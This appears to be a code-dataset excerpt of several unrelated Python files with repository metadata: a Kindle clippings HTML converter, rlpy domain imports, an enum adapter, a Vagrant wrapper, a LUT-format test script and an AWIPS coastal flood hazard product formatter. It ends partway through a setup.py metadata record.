rafalkaron/KindleClippingsBeautifier
|
10d79da2a073f8867041a2520d7a234937237243
|
[
"MIT"
] | null | null | null |
Klipps/convert.py
|
rafalkaron/KindleClippingsBeautifier
|
10d79da2a073f8867041a2520d7a234937237243
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import re
import datetime
from .feed import read_file
__author__ = "Rafał Karoń <rafalkaron@gmail.com>"
def clipps_str_to_html_str(clipps_str):
"""Return a string that contains the converted \"Kindle Clippings.txt file\" to HTML."""
# ADD ELEMENTS (SVG favicon encoded with: https://yoksel.github.io/url-encoder/)
pre_elements = r"""<!DOCTYPE html>
<html>
<head>
<title>Kindle Clippings</title>
<meta charset="utf-8">
<link href="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8' standalone='no'%3F%3E%3C!-- Created with Inkscape (http://www.inkscape.org/) --%3E%3Csvg xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:cc='http://creativecommons.org/ns%23' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns%23' xmlns:svg='http://www.w3.org/2000/svg' xmlns='http://www.w3.org/2000/svg' xmlns:sodipodi='http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd' xmlns:inkscape='http://www.inkscape.org/namespaces/inkscape' width='1000' height='1000' viewBox='0 0 264.58335 264.58335' version='1.1' id='svg8' inkscape:version='0.92.4 (5da689c313, 2019-01-14)' sodipodi:docname='klipps3.svg' inkscape:export-filename='C:%5CUsers%5Crafal%5CDesktop%5Cklipps3.png' inkscape:export-xdpi='72.000008' inkscape:export-ydpi='72.000008'%3E%3Ctitle id='title3713'%3EKlipps%3C/title%3E%3Cdefs id='defs2' /%3E%3Csodipodi:namedview id='base' pagecolor='%23515151' bordercolor='%23000000' borderopacity='1' inkscape:pageopacity='0.20784314' inkscape:pageshadow='2' inkscape:zoom='0.25' inkscape:cx='30.072603' inkscape:cy='582.33116' inkscape:document-units='px' inkscape:current-layer='layer1' showgrid='false' inkscape:window-width='1842' inkscape:window-height='1057' inkscape:window-x='70' inkscape:window-y='-8' inkscape:window-maximized='1' units='px' inkscape:showpageshadow='false' showborder='true' inkscape:pagecheckerboard='false' showguides='true' inkscape:guide-bbox='true'%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0,1' id='guide3724' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='1,0' id='guide3726' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='79.375005,79.375005' orientation='-0.70710678,0.70710678' id='guide3748' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0.70710678,0.70710678' id='guide3750' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458327,150.45027' orientation='-0.70710678,0.70710678' id='guide3776' inkscape:locked='false' /%3E%3Csodipodi:guide position='150.45027,26.458323' orientation='-0.70710678,0.70710678' id='guide3778' inkscape:locked='false' /%3E%3Csodipodi:guide position='114.13307,238.12501' orientation='0.70710678,0.70710678' id='guide3780' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458335,150.45028' orientation='0.70710678,0.70710678' id='guide3782' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='150.45028,26.458334' orientation='1,0' id='guide3801' inkscape:locked='false' /%3E%3Csodipodi:guide position='238.12501,114.13307' orientation='0,1' id='guide3803' inkscape:locked='false' /%3E%3Csodipodi:guide position='132.29167,114.13307' orientation='-0.70710678,0.70710678' id='guide3806' inkscape:locked='false' /%3E%3Csodipodi:guide position='26.458336,150.45028' orientation='0,1' id='guide3826' inkscape:locked='false' /%3E%3C/sodipodi:namedview%3E%3Cmetadata id='metadata5'%3E%3Crdf:RDF%3E%3Ccc:Work rdf:about=''%3E%3Cdc:format%3Eimage/svg+xml%3C/dc:format%3E%3Cdc:type rdf:resource='http://purl.org/dc/dcmitype/StillImage' /%3E%3Cdc:title%3EKlipps%3C/dc:title%3E%3Cdc:creator%3E%3Ccc:Agent%3E%3Cdc:title%3ERafał Karoń%3C/dc:title%3E%3C/cc:Agent%3E%3C/dc:creator%3E%3C/cc:Work%3E%3C/rdf:RDF%3E%3C/metadata%3E%3Cg inkscape:groupmode='layer' id='layer3' inkscape:label='Background' /%3E%3Cg inkscape:groupmode='layer' id='layer2' inkscape:label='Filling'%3E%3Ccircle style='fill:%23ffffff;stroke-width:0.22826612' id='path3736-9' cx='132.29167' cy='132.29169' r='114.13306' /%3E%3C/g%3E%3Cg inkscape:label='Icon' inkscape:groupmode='layer' id='layer1' transform='translate(0,-32.416632)'%3E%3Cpath style='fill:%23e63946;stroke-width:1.32083833;fill-opacity:1' d='M 431.36914 100 L 100 431.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 431.36914 100 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770' /%3E%3Cpath style='fill:%231d3557;fill-opacity:1;stroke-width:1.32083833' d='M 500 500 L 500 831.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 831.36914 500 L 500 500 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770-4' /%3E%3C/g%3E%3C/svg%3E%0A" rel='icon' type='image/svg'/>
</head>
<body>"""
heading = "<h1>Kindle Clippings</h1>\n<h2>"
footer = f"<footer>Generated on {datetime.datetime.now().strftime('%B %d, %Y')} at {datetime.datetime.now().strftime('%I:%M %p')} with <a target=\"_blank\" href=\"https://github.com/rafalkaron/Klipps\">Klipps</a></footer>"
post_elements = "</body>\n</html>"
html_str = "\n".join((pre_elements, heading, clipps_str, footer, post_elements))
# SEARCH AND REPLACE
html_str = re.sub(r"\n\n", "\n", html_str) # Removes empty lines
html_str = re.sub(r"==========", "<div class=\"entry\">\n<h2>", html_str) # Replaces Kindle entryies markup with the "entry" class and opens headers 2
html_str = re.sub(r"- .* \| ", "###timestamp### ", html_str) # Removes redundant information from timestamps and adds a tag that is used to optimize RE in the next lines
for added_on in re.findall(r"^###timestamp### .*", html_str, re.MULTILINE): # Shortens and wraps timestamps || MAKE THIS GENERIC FOR OTHER LANGUAGES
added_on_new = re.sub(r"###timestamp###", "", added_on) # Removes the ###timestamp### tag
added_on_new = re.sub(r":\d\d$", "", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 24h timestamps
added_on_new = re.sub(r":\d\d PM$", " PM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h PM timestamps
added_on_new = re.sub(r":\d\d AM$", " AM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h AM timestamps
added_on_new = re.sub(r"^ Added on ", "", added_on_new) # [Optional] Removes the "Added on" timestamp text
added_on_new = f"<div class=\"timestamp\">{added_on_new}</div>\n<blockquote>" # Wraps timestamps in timestamp divs and opens a blockquote
html_str = re.sub(added_on, added_on_new, html_str)
html_str = re.sub(r"<div class=\"timestamp\">", "</h2>\n<div class=\"timestamp\">", html_str) # Closes headers 2 before timestamps
html_str = re.sub(r"<div class=\"entry\">\n<h2>\n<footer>", "</blockquote>\n</div>\n<footer>", html_str) # Removes redundant entry divs and headers 2 before the footer
html_str = re.sub("<div class=\"entry\">\n<h2>", "</blockquote>\n</div>\n<div class=\"entry\">\n<h2>", html_str) # Closes blockquote and entry div before opening anothe entry div
html_str = re.sub(r"</h1>\n<h2>", "</h1>\n<div class=\"entry\">\n<h2>", html_str) # Opens the first element div after
return html_str
def default_style_html_str(html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a default embedded CSS style."""
html_str = re.sub("<h1>", "<div class=\"frontpage\"><h1>", html_str)
html_str = re.sub("</h1>", "</h1>\n<div class=\"generator\"><p>Generated with Klipps</p></div>\n</div>", html_str)
html_str = re.sub("/>\n</head>", """/>
<style>
*{
font-family: Helvetica, Arial, sans-serif;
font-size: 100%;
margin: 0px;
}
.frontpage{
background-color: #1D3557;
height: 100vh;
}
h1{
font-size: 10vw;
text-align: center;
padding-top: 15vh;
padding-bottom: 20vh;
padding-left: 1vh;
padding-right: 1vh;
color: #F1FAEE;
}
.generator{
font-size: 3vw;
text-align: center;
color: #F1FAEE;
}
.entry{
padding: 4rem 8vw 4rem 8vw;
}
.entry:nth-child(odd){
background: #F1FAEE;
}
.entry:nth-child(even){
background: rgb(228, 235, 226);
}
h2{
font-size: 2.6rem;
color: #1D3557;
}
.timestamp{
font-size: 1.2rem;
font-weight: bold;
padding-bottom: 1rem;
color: #1D3557;
}
blockquote{
font-size: 1.5rem;
text-align: justify;
color: #1D3557;
}
footer{
font-size: 1.5rem;
padding: 2rem 1rem 2rem 1rem;
background-color: #1D3557;
color: #F1FAEE;
text-align: center;
}
a{
color: #E63946;
font-weight: bolder;
text-decoration: none;
}
</style>
</head>""", html_str)
return html_str
def custom_style_html_str(css_filepath, html_str):
"""Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a custom embedded CSS style."""
style = read_file(css_filepath)
html_str = re.sub("/>\n</head>", f"/>\n<style>\n{style}\n</style>\n</head>", html_str)
return html_str
| 72.234375
| 4,532
| 0.701709
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,915
| 0.855676
|
05983c5f355ffca2350a3a76badc57638f8db8e8
| 1,308
|
py
|
Python
|
rlpy/Domains/__init__.py
|
okkhoy/rlpy
|
af25d2011fff1d61cb7c5cc8992549808f0c6103
|
[
"BSD-3-Clause"
] | 265
|
2015-01-21T08:11:12.000Z
|
2021-12-21T08:06:21.000Z
|
rlpy/Domains/__init__.py
|
okkhoy/rlpy
|
af25d2011fff1d61cb7c5cc8992549808f0c6103
|
[
"BSD-3-Clause"
] | 22
|
2015-03-26T17:41:43.000Z
|
2019-12-19T08:47:36.000Z
|
rlpy/Domains/__init__.py
|
okkhoy/rlpy
|
af25d2011fff1d61cb7c5cc8992549808f0c6103
|
[
"BSD-3-Clause"
] | 85
|
2015-02-18T00:25:15.000Z
|
2021-11-15T11:10:00.000Z
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
#from Domain import Domain
from future import standard_library
standard_library.install_aliases()
from .HelicopterHover import HelicopterHover, HelicopterHoverExtended
from .HIVTreatment import HIVTreatment
from .PuddleWorld import PuddleWorld
from .GridWorld import GridWorld
from .BlocksWorld import BlocksWorld
from .MountainCar import MountainCar
from .ChainMDP import ChainMDP
from .SystemAdministrator import SystemAdministrator
from .PST import PST
from .Pacman import Pacman
from .IntruderMonitoring import IntruderMonitoring
from .FiftyChain import FiftyChain
from .FlipBoard import FlipBoard
from .RCCar import RCCar
from .Acrobot import Acrobot, AcrobotLegacy
from .Bicycle import BicycleBalancing, BicycleRiding
from .Swimmer import Swimmer
from .Pinball import Pinball
from .FiniteTrackCartPole import (FiniteCartPoleBalance,
FiniteCartPoleBalanceOriginal,
FiniteCartPoleBalanceModern,
FiniteCartPoleSwingUp,
FiniteCartPoleSwingUpFriction)
from .InfiniteTrackCartPole import InfCartPoleBalance, InfCartPoleSwingUp
| 40.875
| 73
| 0.786697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 26
| 0.019878
|
0598570bbddd550266f613922fec2e9624969d88
| 365
|
py
|
Python
|
mercury_engine_data_structures/adapters/enum_adapter.py
|
Antidote/mercury-engine-data-structures
|
d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64
|
[
"MIT"
] | 2
|
2021-06-18T16:47:00.000Z
|
2021-07-06T22:36:32.000Z
|
mercury_engine_data_structures/adapters/enum_adapter.py
|
Antidote/mercury-engine-data-structures
|
d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64
|
[
"MIT"
] | 1
|
2021-10-01T20:26:01.000Z
|
2021-10-01T20:26:01.000Z
|
mercury_engine_data_structures/adapters/enum_adapter.py
|
Antidote/mercury-engine-data-structures
|
d8e8ba1eacaa37f4fc76b78bb208ffc2cde61f64
|
[
"MIT"
] | 5
|
2021-08-23T17:01:01.000Z
|
2021-11-20T03:57:14.000Z
|
from construct import Adapter, Int32ub, Enum
class EnumAdapter(Adapter):
def __init__(self, enum_class, subcon=Int32ub):
super().__init__(Enum(subcon, enum_class))
self._enum_class = enum_class
def _decode(self, obj, context, path):
return self._enum_class[obj]
def _encode(self, obj, context, path):
return obj.name
| 26.071429
| 51
| 0.682192
| 317
| 0.868493
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
05995048419b1dbd1bd29b14c238cf37023f8b47
| 2,740
|
py
|
Python
|
lib/strider/virt/vagrantbox.py
|
jcftang/strider
|
432a68eb1303541b6d955bd6ecf7439d1f9b0d48
|
[
"Apache-2.0"
] | 16
|
2016-02-10T13:06:50.000Z
|
2021-02-28T06:21:16.000Z
|
lib/strider/virt/vagrantbox.py
|
jcftang/strider
|
432a68eb1303541b6d955bd6ecf7439d1f9b0d48
|
[
"Apache-2.0"
] | 4
|
2016-02-20T16:33:40.000Z
|
2016-05-28T10:46:06.000Z
|
lib/strider/virt/vagrantbox.py
|
jcftang/strider
|
432a68eb1303541b6d955bd6ecf7439d1f9b0d48
|
[
"Apache-2.0"
] | 1
|
2016-09-01T11:06:56.000Z
|
2016-09-01T11:06:56.000Z
|
import vagrant
import os
from subprocess import CalledProcessError
from strider.common.instance_data import InstanceData, SshData
import strider.common.logger
class Vagrantbox(object):
def __init__(self,
name=None,
ssh=None,
basebox=None,
bake_name=None,
bake_description=None,
user_data=None):
self.name = name
self.bake_name = bake_name
self.basebox = basebox
self.ssh = ssh
self.log = strider.utils.logger.get_logger('Vagrant')
if type(self.ssh) != dict:
raise Exception("expecting 'ssh' to be a dictionary")
self.vagrant_instance = vagrant.Vagrant()
def describe(self):
details = self._details()
if details is None:
return InstanceData(present=False)
else:
if self.ssh['username'] is not None:
username = self.ssh['username']
else:
username = "vagrant"
if self.ssh['private_key_path'] is not None:
private_key_path = self.ssh['private_key_path']
else:
private_key_path = details['IdentityFile']
port = details['Port']
host = details['HostName']
ssh_data = SshData(keyfile=private_key_path,
user=username,
host=host,
port=port)
return InstanceData(present=True,
provider_specific=details,
ssh=ssh_data)
def destroy(self):
self.log("destroying instance")
try:
self.vagrant_instance.destroy()
except CalledProcessError:
self.log("already destroyed instance")
try:
os.remove("./Vagrantfile")
except OSError:
self.log("already removed Vagrantfile")
def up(self):
self.log("determining if we need to create an instance")
try:
self.vagrant_instance.init(box_name=self.basebox)
except CalledProcessError:
self.log("already initialised instance")
try:
self.log("bring up instance")
self.vagrant_instance.up()
except CalledProcessError:
self.log("already up")
def _details(self):
try:
conf = self.vagrant_instance.conf()
return conf
except CalledProcessError:
self.log("No instance running")
return None
def bake(self):
self.log("baking vagrant box")
os.system("vagrant package --output {}.box".format(self.bake_name))
self.up()
| 31.860465
| 75
| 0.550365
| 2,578
| 0.940876
| 0
| 0
| 0
| 0
| 0
| 0
| 414
| 0.151095
|
552672dd092eb5fb84094dd67c6ad2cf6eb3df04
| 4,739
|
py
|
Python
|
python/aces/lutFormats/tests/UnitTestsLutFormats.py
|
aforsythe/clf
|
47ba8bee31bd13e4f23632c7b0a38293be31c019
|
[
"AMPAS"
] | 43
|
2015-07-09T23:13:41.000Z
|
2022-02-04T15:45:42.000Z
|
python/aces/lutFormats/tests/UnitTestsLutFormats.py
|
aforsythe/clf
|
47ba8bee31bd13e4f23632c7b0a38293be31c019
|
[
"AMPAS"
] | 1
|
2019-09-18T14:30:39.000Z
|
2019-09-18T14:30:39.000Z
|
python/aces/lutFormats/tests/UnitTestsLutFormats.py
|
aforsythe/clf
|
47ba8bee31bd13e4f23632c7b0a38293be31c019
|
[
"AMPAS"
] | 9
|
2015-07-10T15:26:55.000Z
|
2020-08-20T11:52:47.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Academy / ASC Common LUT Format Sample Implementations are provided by the
Academy under the following terms and conditions:
Copyright © 2015 Academy of Motion Picture Arts and Sciences ("A.M.P.A.S.").
Portions contributed by others as indicated. All rights reserved.
A worldwide, royalty-free, non-exclusive right to copy, modify, create
derivatives, and use, in source and binary forms, is hereby granted, subject to
acceptance of this license. Performance of any of the aforementioned acts
indicates acceptance to be bound by the following terms and conditions:
* Copies of source code, in whole or in part, must retain the above copyright
notice, this list of conditions and the Disclaimer of Warranty.
* Use in binary form must retain the above copyright notice, this list of
conditions and the Disclaimer of Warranty in the documentation and/or other
materials provided with the distribution.
* Nothing in this license shall be deemed to grant any rights to trademarks,
copyrights, patents, trade secrets or any other intellectual property of
A.M.P.A.S. or any contributors, except as expressly stated herein.
* Neither the name "A.M.P.A.S." nor the name of any other contributors to this
software may be used to endorse or promote products derivative of or based on
this software without express prior written permission of A.M.P.A.S. or the
contributors, as appropriate.
This license shall be construed pursuant to the laws of the State of California,
and any disputes related thereto shall be subject to the jurisdiction of the
courts therein.
Disclaimer of Warranty: THIS SOFTWARE IS PROVIDED BY A.M.P.A.S. AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL A.M.P.A.S., OR ANY
CONTRIBUTORS OR DISTRIBUTORS, BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, RESITUTIONARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
WITHOUT LIMITING THE GENERALITY OF THE FOREGOING, THE ACADEMY SPECIFICALLY
DISCLAIMS ANY REPRESENTATIONS OR WARRANTIES WHATSOEVER RELATED TO PATENT OR
OTHER INTELLECTUAL PROPERTY RIGHTS IN THE ACES CONTAINER REFERENCE
IMPLEMENTATION, OR APPLICATIONS THEREOF, HELD BY PARTIES OTHER THAN A.M.P.A.S.,
WHETHER DISCLOSED OR UNDISCLOSED.
"""
__author__ = 'Haarm-Pieter Duiker'
__copyright__ = 'Copyright (C) 2015 Academy of Motion Picture Arts and Sciences'
__maintainer__ = 'Academy of Motion Picture Arts and Sciences'
__email__ = 'acessupport@oscars.org'
__status__ = 'Production'
__major_version__ = '1'
__minor_version__ = '0'
__change_version__ = '0'
__version__ = '.'.join((__major_version__,
__minor_version__,
__change_version__))
'''
Simple tests of the lutFormats module
Should be turned into a proper set of unit tests.
'''
import os
import sys
# Make sure we can import lutFormats
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
import lutFormats
tmpDir = "/tmp"
#aces1OCIOConfirDir = "/work/client/academy/ocio/hpd/OpenColorIO-Configs/aces_1.0.0"
aces1OCIOConfirDir = "/path/to/OpenColorIO-Configs/aces_1.0.0"
spiPath = "%s/luts/ACEScc_to_linear.spi1d" % aces1OCIOConfirDir
cspPath = "%s/baked/maya/sRGB (D60 sim.) for ACEScg Maya.csp" % aces1OCIOConfirDir
spipl = lutFormats.Registry.read( spiPath )
csppl = lutFormats.Registry.read( cspPath )
newSpiPath = "%s/ACEScc_to_linear_new.spi1d" % tmpDir
lutFormats.Registry.write(spipl, newSpiPath)
newSpi3dPath = "%s/srgb_new.spi3d" % tmpDir
lutFormats.Registry.write(csppl, newSpi3dPath, lutDataFormat="3D")
newCspPath = "%s/srgb_new_3d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCspPath, lutDataFormat="3D")
newCsp1DPath = "%s/srgb_new_1d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCsp1DPath)
newCsp1D3DPath = "%s/srgb_new_1d3d.csp" % tmpDir
lutFormats.Registry.write(csppl, newCsp1D3DPath, lutDataFormat="1D_3D_1D")
newClf1D3DPath = "%s/srgb_new_1d3d.clf" % tmpDir
lutFormats.Registry.write(csppl, newClf1D3DPath, lutDataFormat="1D_3D_1D")
newCtl1DPath = "%s/srgb_new_1d.ctl" % tmpDir
lutFormats.Registry.write(csppl, newCtl1DPath)
newCtl1D3DPath = "%s/srgb_new_3d.ctl" % tmpDir
lutFormats.Registry.write(csppl, newCtl1D3DPath, lutDataFormat="3D")
| 40.853448
| 84
| 0.779067
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,502
| 0.738819
|
552683d69b93369ce9f2b67f499349c272254782
| 10,177
|
py
|
Python
|
edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/product/Hazard_CFW_MultiPil.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | 1
|
2021-10-30T00:03:05.000Z
|
2021-10-30T00:03:05.000Z
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
########################################################################
# Hazard_CFW.py
#
#
##########################################################################
import GenericHazards
import string, time, re, os, types, copy
class TextProduct(GenericHazards.TextProduct):
Definition = copy.deepcopy(GenericHazards.TextProduct.Definition)
Definition['displayName'] = None
Definition['displayName'] = "BaselineHazard_CFW_<MultiPil> (Coastal/LakeShore Flooding)"
Definition["defaultEditAreas"] = "EditAreas_PublicZones_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Zones_<site>" # Map background for creating Combinations
# Header configuration items
Definition["productName"] = "Coastal Hazard Message" # Warning! DO NOT CHANGE.
# The productName gets substituted later in the formatter!
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
#Definition["areaName"] = "Statename" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city state
Definition["wfoCity"] = "<wfoCity>" # WFO Name as it should appear in a text product
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CFW_<MultiPil>.txt"
Definition["bulletProd"] = 1 #If 1, the product has a bullet format
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["displayOutputDialog"] = 0 # If 1 will display results when finished
Definition["debug"] = 1
#Definition["headlineEditAreaGroup"] = "Zones" # Name of EditAreaGroup for sampling headlines
Definition["purgeTime"] = 8 # Maximum hours for expireTime from issueTime
Definition["includeCities"] = 0 # Cities included in area header
Definition["accurateCities"] = 0 # If 1, cities are based on grids;
# otherwise full list is included
Definition["cityLocation"] = "CityLocation" # City lat/lon dictionary to use
#Definition["cityDescriptor"] = "Including the cities of"
Definition["includeZoneNames"] = 1 # Zone names will be included in the area header
Definition["lineLength"] = 66 # line length
Definition["easPhrase"] = "URGENT - IMMEDIATE BROADCAST REQUESTED"
Definition["includeOverviewHeadline"] = 1 #If 1, the overview header is templated
Definition["includeOverview"] = 1 #If 1, the overview section is templated
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
###
### Text to insert below the last $$ of the product (WFO URL)
### use "" if you do not want text to appear
## Definition["urlText"] = "http://www.weather.gov/miami"
### no additional text example
Definition["urlText"] = ""
### multiple line example
## Definition["urlText"] = "For more information from NOAA/s National Weather Service visit...\n" + \
## "http://weather.gov/saltlakecity"
###
def __init__(self):
GenericHazards.TextProduct.__init__(self)
#
# These are the products allowed in the Coastal Flood Products
#
def allowedHazards(self):
allActions = ["NEW", "EXA", "EXB", "EXT", "CAN", "CON", "EXP"]
return [
('CF.W', allActions, 'CoastalFlood'), # COASTAL FLOOD WARNING
('CF.Y', allActions, 'CoastalFlood'), # COASTAL FLOOD ADVISORY
('CF.A', allActions, 'CoastalFlood'), # COASTAL FLOOD WATCH
('CF.S', allActions, 'CoastalFloodStatement'), # COASTAL FLOOD STATEMENT
('LS.W', allActions, 'CoastalFlood'), # LAKESHORE FLOOD WARNING
('LS.Y', allActions, 'CoastalFlood'), # LAKESHORE FLOOD ADVISORY
('LS.A', allActions, 'CoastalFlood'), # LAKESHORE FLOOD WATCH
('LS.S', allActions, 'CoastalFloodStatement'), # LAKESHORE FLOOD STATEMENT
('SU.W', allActions, 'HighSurf'), # HIGH SURF WARNING
('SU.Y', allActions, 'HighSurf'), # HIGH SURF ADVISORY
('BH.S', allActions, 'BeachHaz'), # Beach Hazards Statement
('RP.S', allActions, 'RipCurrent'), # HIGH RIP CURRENT RISK
]
def _bulletDict(self):
return {
"CF" : ("Coastal Flooding,Timing,Impacts"), ### coastal flood warning, advisory, watch
"LS" : ("Lake Shore Flooding,Timing,Impacts"), ### lake shore flood warning, advisory, watch
"BH" : ("Hazards,Timing,Location,Potential Impacts"), ### hazardous beach conditions
"SU" : ("Waves and Surf,Timing,Impacts"), ### high surf warning, advisory
"RP" : ("Timing,Impacts"), ### high rip current risk
}
def _bulletOrder(self):
return [
"Coastal Flooding",
"Lake Shore Flooding",
"Waves and Surf",
"Hazards",
"Timing",
"Location",
"Potential Impacts",
"Impacts",
]
#
# Overridden to allow for attribution statement
#
def _makeProduct(self, fcst, segmentAreas, argDict):
argDict["language"] = self._language
#
# This section generates the headline on the segment
#
# stuff argDict with the segmentAreas for DiscretePhrases
argDict['segmentAreas'] = segmentAreas
editArea = segmentAreas[0]
areaLabel = editArea
headlines = self.generateProduct("Hazards", argDict, area = editArea,
areaLabel=areaLabel,
timeRange = self._timeRange)
fcst = fcst + headlines
#
# This section generates the attribution statements and calls-to-action
#
hazardsC = argDict['hazards']
listOfHazards = hazardsC.getHazardList(segmentAreas)
fcst = fcst + self.hazardBodyText(listOfHazards, argDict)
#
# If an overview exists for this product, calculate it
#
self.overviewText(listOfHazards, "CFW")
#
# Clean up and return
#
fcst = self.endline(fcst, linelength=self._lineLength, breakStr=[" ", "-", "..."])
return fcst
def _postProcessProduct(self, fcst, argDict):
#
# If an overview exists for this product, insert it
#
overview = self.finalOverviewText()
overviewSearch = re.compile(r'Default overview section', re.DOTALL)
fcst = overviewSearch.sub(overview, fcst)
urgent = 0
followup = 1
prodNameKey = ''
fullKeyList = []
newList = ['NEW', 'EXA', 'EXB']
hazardsC = argDict['hazards']
segmentList = self.organizeHazards(hazardsC.rawAnalyzedTable())
for segmentAreas in segmentList:
listOfHazards = hazardsC.getHazardList(segmentAreas)
for eachHazard in listOfHazards:
if eachHazard['phensig'] not in fullKeyList:
fullKeyList.append(eachHazard['phensig'])
if eachHazard['phensig'] in ['CF.W', 'CF.A', 'LS.W', 'LS.A']:
if eachHazard['act'] in newList:
urgent = 1
# remove eas line if not urgent
if urgent == 0 and len(self._easPhrase):
fcst = fcst.replace(self._easPhrase + '\n', '', 1)
# rename the product if necessary based on VTEC codes
for each in fullKeyList:
if each in ['LS.W', 'LS.A', 'LS.Y', 'LS.S']:
productName = "Lakeshore Hazard Message"
fcst = fcst.replace(self._productName, productName, 1)
break
# Added to place line feeds in the CAP tags to keep separate from CTAs
fcst = string.replace(fcst, \
r"PRECAUTIONARY/PREPAREDNESS ACTIONS\.\.\.", \
r"\nPRECAUTIONARY/PREPAREDNESS ACTIONS\.\.\.\n")
fcst = string.replace(fcst, ".:", ".")
fcst = string.replace(fcst, "\n ","\n")
fcst = string.replace(fcst, "&&", "\n&&\n")
# Prevent empty Call to Action Tags
fcst = re.sub(r'\nPRECAUTIONARY/PREPAREDNESS ACTIONS\.\.\.\s*&&\n', \
"", fcst)
### to remove any empty framing code
fcst = re.sub("\|\*\s*\*\|", "", fcst)
### indent the bullet text
fcst = self._indentBulletText(fcst)
#
# Clean up multiple line feeds
#
fixMultiLF = re.compile(r'(\n\n)\n*', re.DOTALL)
fcst = fixMultiLF.sub(r'\1', fcst)
#
# Finish Progress Meter
#
self.setProgressPercentage(100)
self.progressMessage(0, 100, self._displayName + " Complete")
### add the url text from the configuration section
fcst = fcst + "\n" + self._urlText
return fcst
| 40.384921
| 105
| 0.584455
| 9,120
| 0.896138
| 0
| 0
| 0
| 0
| 0
| 0
| 5,482
| 0.538666
|
552924a7e504599cbe9d1cfc08f6a123e6773a8c
| 880
|
py
|
Python
|
setup.py
|
hubmapconsortium/python-sdk
|
